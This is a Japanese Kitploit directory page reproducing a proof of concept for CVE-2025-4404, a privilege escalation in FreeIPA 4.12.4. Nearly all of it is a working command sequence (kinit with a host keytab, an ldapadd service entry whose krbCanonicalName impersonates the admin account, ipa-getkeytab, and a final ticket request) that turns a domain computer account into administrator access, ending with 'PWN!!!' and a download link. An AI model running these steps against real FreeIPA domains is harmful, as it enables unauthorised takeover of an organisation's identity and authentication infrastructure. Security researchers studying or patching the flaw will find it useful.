Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-4404-POC — CVE-2025-4404 の PoC | Kitploit
ツール/GitHubGitHub/im10n/cve-2025-4404-poc
特権昇格脆弱性分析エクスプロイトペネトレーションテスト認証
GitHubim10n/cve-2025-4404-poc

CVE-2025-4404-POC

CVE-2025-4404 の PoC

リポジトリを見る
61年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-4404 POC

CVE-2025-4404 の PoC

ドメインコンピュータアカウント (host/pc1.[email protected]) を持っている場合、デフォルトでサービスを追加できます。そして、krbPrincipalName と krbCanonicalName を設定できます。デフォルトでは、FreeIPA 4.12.4 の管理者アカウントでは krbCanonicalName 属性値が欠落しています。krbPrincipalName の値で Kerberos チケットを要求できますが、チケットには krbCanonicalName の値が含まれます。

さあ、始めましょう

  1. まず、コンピュータアカウントに代わってチケットを要求します: $ kinit host/[email protected] -k -t /etc/krb5.keytab

  2. LDAP サービスアカウントを追加します:

root@kitploit:~
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
  1. Keytab を要求します
root@kitploit:~
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
  1. チケットを要求します $ kinit --no-request-pac -k -t ./test.keytab test/[email protected]

PWN!!!

チケットは次のように確認できます: ldapwhoami -H ldap://dc1.test.local

ツールをダウンロード